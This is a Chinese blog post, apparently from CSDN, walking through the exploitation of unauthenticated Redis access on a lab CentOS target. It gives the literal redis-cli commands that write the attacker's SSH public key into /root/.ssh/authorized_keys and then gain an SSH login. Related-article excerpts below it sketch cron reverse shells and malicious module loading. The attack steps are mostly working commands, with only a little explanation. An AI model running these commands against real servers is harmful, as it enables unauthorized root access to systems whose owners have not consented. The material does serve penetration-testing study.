redis未授权访问利用

最新推荐文章于 2024-05-09 00:07:21 发布

StarLord007

最新推荐文章于 2024-05-09 00:07:21 发布

阅读量370

点赞数

分类专栏：渗透测试

本文链接：https://blog.csdn.net/q1694222672/article/details/104843502

版权

渗透测试专栏收录该内容

6 篇文章

订阅专栏

文章目录

准备环境
连接测试
利用方式：写入本地公钥

准备环境

靶机一台：centos7,172.16.12.2
开redis服务，6379

本机，有redis-cli客户端

连接测试

redis-cli -h 172.16.12.2

在这里插入图片描述

利用方式：写入本地公钥

生成本地公钥

ssh-keygen -t rsa

在这里插入图片描述

写入公钥到redis

(echo -e "\n\n"; cat ~/.ssh/id_rsa.pub; echo -e "\n\n") > /tmp/foo.txt

cat /tmp/foo.txt |  /usr/redis/redis-cli -h 172.16.12.2 -p 6379 -x set crackit

在这里插入图片描述

连接redis写入靶机

redis-cli -h 172.16.12.2
keys *
config set dir /root/.ssh
config get dir
config set dbfilename "authorized_keys"
save 
exit

在这里插入图片描述

连接靶机

因为设置了phase，所以输入123456
在这里插入图片描述

确定要放弃本次机会？

福利倒计时

: :

立减 ¥

普通VIP年卡可用

立即使用

StarLord007

关注关注

0
点赞
踩
0

收藏

觉得还不错? 一键收藏
0
评论
分享

复制链接

分享到 QQ

分享到新浪微博

扫一扫
举报

举报

专栏目录

关于Redis未授权访问漏洞利用的介绍与修复建议

01-21

本文主要给大家介绍了关于Redis未授权访问漏洞利用的相关内容，文中对该漏洞进行了详细，并给出了相对应的修复/安全建议，下面话不多说了，来一起看看详细的介绍吧。一、漏洞介绍 Redis 默认情况下，会绑定在 0.0....

redis未授权访问漏洞

weixin_42140534的博客

01-18

1028

0X01 漏洞介绍 redis 默认情况下，会绑定再 0.0.0.0：6379, 如果没有进行采用相关的策略，如添加防火墙规则避免其他非信任来源的ip访问，这样会将redis的服务暴漏在公网上，如果在没有设置密码认证的情况下，会导致任意用户可以访问目标服务器的情况下未授权访问redis以及读取redis数据。攻击者在未授权访问redis的情况下，利用redis自身提供的config命令，可以进行写文件的操作，攻击者可以成功将自己的ssh公钥写入目标服务器的/root/.ssh文件夹的authotrized_

参与评论您还未登录，请先登录后发表或查看评论

请务必注意 Redis 安全配置，否则将导致轻松被入侵

多看多听多总结

12-16

4455

一、前言前段时间，在做内网影响程度评估的时候写了扫描利用小脚本，扫描后统计发现，内网中60%开放了redis6379端口的主机处于可以被利用的危险状态，因为都是一些默认配置造成的考虑到本社区大部分开发者都会使用redis，特此分享下以便大家可以对自己公司的内网进行一个排查。二、漏洞介绍 Redis 默认情况下，会绑定在 0.0.0.0:6379，这样将会将 Red

Redis未授权访问配合SSH key的综合利用

hyy615545936的博客

09-11

1618

【实验原理】利用 Redis 自身的提供的config命令，可以进行写文件操作，恶意访问者可以成功将自己的公钥写入目标服务器的/root/.ssh文件夹的authotrized_keys文件中，进而可以直接使用对应的私钥登录目标服务器。步骤一：在本地生产公私钥文件 linux系统行使用命令ssh-keygen -t rsa生成本地公钥和私钥文件，输入密码口令；如下其显示成功生成公...

redis故障记录

weixin_30898109的博客

12-16

203

最近线上的redis出现无法访问的现象，redis-cli能进入，但是任何命令都提示需要密码验证，以前一直都没有设置密码的，重启redis后正常，没过多久又出现了这个问题。在此记录下解决方法。 Redis是一个开源的使用ANSI C语言编写、支持网络、可基于内存亦可持久化的日志型、Key-Value数据库，并提供多种语言的API。 Redis 未授权访问的问题是...

linux echo命令的-n、-e两个参数

热门推荐

水滴石穿

02-25

1万+

echo -n 不换行输出 $echo -n "123" $echo "456" 最终输出 123456 而不是123456 echo -e 处理特殊字符若字符串中出现以下字符，则特别加以处理，而不会将它当成一般文字输出： \a 发出警告声； \b 删除前一个字符； \c 最后不加上换行符号； \f 换行但光标仍旧停留在原来的位置； \n 换行且光标移至行首； \r 光标移

redis未授权访问利用汇总

今天是几号的博客

03-17

1339

原理就是在数据库中插入一条数据，将本机的公钥作为value，key值随意，然后通过修改数据库的默认路径为/root/.ssh和默认的缓冲文件authorized.keys，把缓冲的数据保存在文件里，这样就可以在服务器端的/root/.ssh下生成一个授权的key。/var/spool/cron/ 这个目录下存放的是每个用户包括root的crontab任务，每个任务以创建者的名字命名，比如tom建的crontab任务对应的文件就是/var/spool/cron/tom。

Redis未授权访问利用

LiuSiXian的博客

07-14

874

Redis服务器:192.168.100.10攻击机:192.168.15.101。

Redis未授权访问利用合集

em.....

07-07

893

微信公众号：小惜渗透，欢迎大佬一起交流进步正常redis默认情况下，会绑定在0.0.0.0:6379，如果没有限制来源IP并且甚至没有密码，那么就会导致攻击者非法访问，并读取Redis的数据，还可以利用自身config命令进行写入操作，攻击者可将自己的ssh公钥写入目标服务器的/root/.ssh文件夹的authotrized_keys中，进而直接使用对应私钥登录目标服务器。搭建环境：将这行绑定本地加上注释（还可以改成0.0.0.0）将保护模式关闭保存，然后启动redis服务切记别忘了关防火墙在/roo

Redis未授权访问利用总结

2ed

10-09

1725

漏洞概述 Redis 默认情况下，会绑定在 0.0.0.0:6379，这样将会将 Redis 服务暴露到公网上，如果在没有开启认证的情况下，可以导致任意用户在可以访问目标服务器的情况下未授权访问 Redis 以及读取 Redis 的数据。攻击者在未授权访问 Redis 的情况下可以利用 Redis 的相关方法，可以成功在 Redis 服务器上写入公钥，进而可以使用对应私钥直接登录目标服务器。漏洞...

Redis未授权访问漏洞利用姿势的五种基础姿势

weixin_74182283的博客

03-27

1145

进行一个定时任务的配置指定路径与文件名，set 一个键名叫x 后面那一堆都是他的值 \n是为了隔开其他的信息（同第一段那个意思）其中的*表示时间（年月日）这里为*表示每分钟都在执行这个任务（将数据一直反弹）后面的/bin/bashxx就是一个反弹shell的正常写法，确认反弹到的主机（将靶机的信息反弹到攻击机kali上，ip就写kali的 8888为开启监听的端口）0>& 这玩意就是将标准输入重定向到标准输出，确保都能被执行到确保交互性，反弹shell不会轻易断开。

Redis未授权访问

最新发布

npc88888的博客

05-09

2893

在 Reids 4.x 之后，Redis新增了模块功能，通过外部拓展，可以实现在redis中实现一个新的Redis命令，通过c语言编译并加载恶意.so文件，达到代码执行的目的。更改目标服务器Redis备份路径为ssh公钥存放目录（一般默认为/root/.ssh）：config set dir /root/.ssh。原文链接：https://blog.csdn.net/weixin_45605352/article/details/118790775。进入/root/.ssh目录: 将生成的公钥保存到。

未授权访问漏洞的检测与利用

Yanug

05-07

3047

一、redis未授权访问漏洞漏洞描述 redis安装完以后，默认是没有账号密码的（安装redis详细可参考：redis相关笔记，如果redis是以root权限去运行，则可以被反弹shell或者写入ssh密钥，从而被获取服务器的权限。漏洞检测 s = socket.socket(socket.AF_INET, socket.SOCK_STREAM) s.connect((host,port)) ...

渗透学习入门学习之环境搭建，web入门

STAR_LORD

11-21

4524

1、搭建渗透测试学习环境 2003r2最好，win7也行2、各种网站解析环境搭建 Asp解析环境搭建小旋风 Php解析环境搭建 phpstudy aspx解析环境搭建 jsp解析环境搭建 jspstudy3、常规渗透环境网络环境解析 1.操作系统选择 Windows2003 2008 Linux red hat FreeBSD Ubuntu等2.网站源码脚本格式 Asp php

SQL注入篇--MySQL数据库手工注入

STAR_LORD

08-01

3149

MySQL数据库主流数据库之一功能完善，强大手工注入 1、判断注入点

GITHUB信息泄露搜集工具GSIL修改版

STAR_LORD

01-10

2915

文章目录项目地址(欢迎Star、Fork)原项目地址修改后的地址关于GSIL-PRO关于开源项目GSIL修改内容使用方式原项目GSIL代码分析，方便快速定位功能点参数配置：限制关于源码，有兴趣的可以改成自己想要的样子项目地址(欢迎Star、Fork) 原项目地址 GSIL 修改后的地址 GSIL_PRO 关于GSIL-PRO 该项目修改自开源项目GSIL，初衷是为了方便自己的使用，并做了一些...

渗透入门学习之http数据包

STAR_LORD

11-25

2365

为什么可以截断数据包? http是一种无状态数据，对数据包拦截不影响它的状态 HTTP修改数据包作用: - 漏洞测试 * 目录遍历 * 注入 * 绕过授权 * xss跨站 * 弱口令爆破 * 上

SQL注入篇--Access数据库手工（联合查询，逐字猜解）加工具注入（sqlmap）

STAR_LORD

07-27

1673

Access数据库正式名称 Microsoft_Access 是一种非常简单但是功能完整的数据库，很适合小型网站创建，可以很轻松管理表和列，有很多管理工具手工注入 1.判断注入点这里采用墨者学院提供的SQL手工注入漏洞测试环境 http://219.153.49.228:47744/new_list.asp?id=1 判断注入点标准三连 ’ ~ and 1=1 ~ and 1=2 ...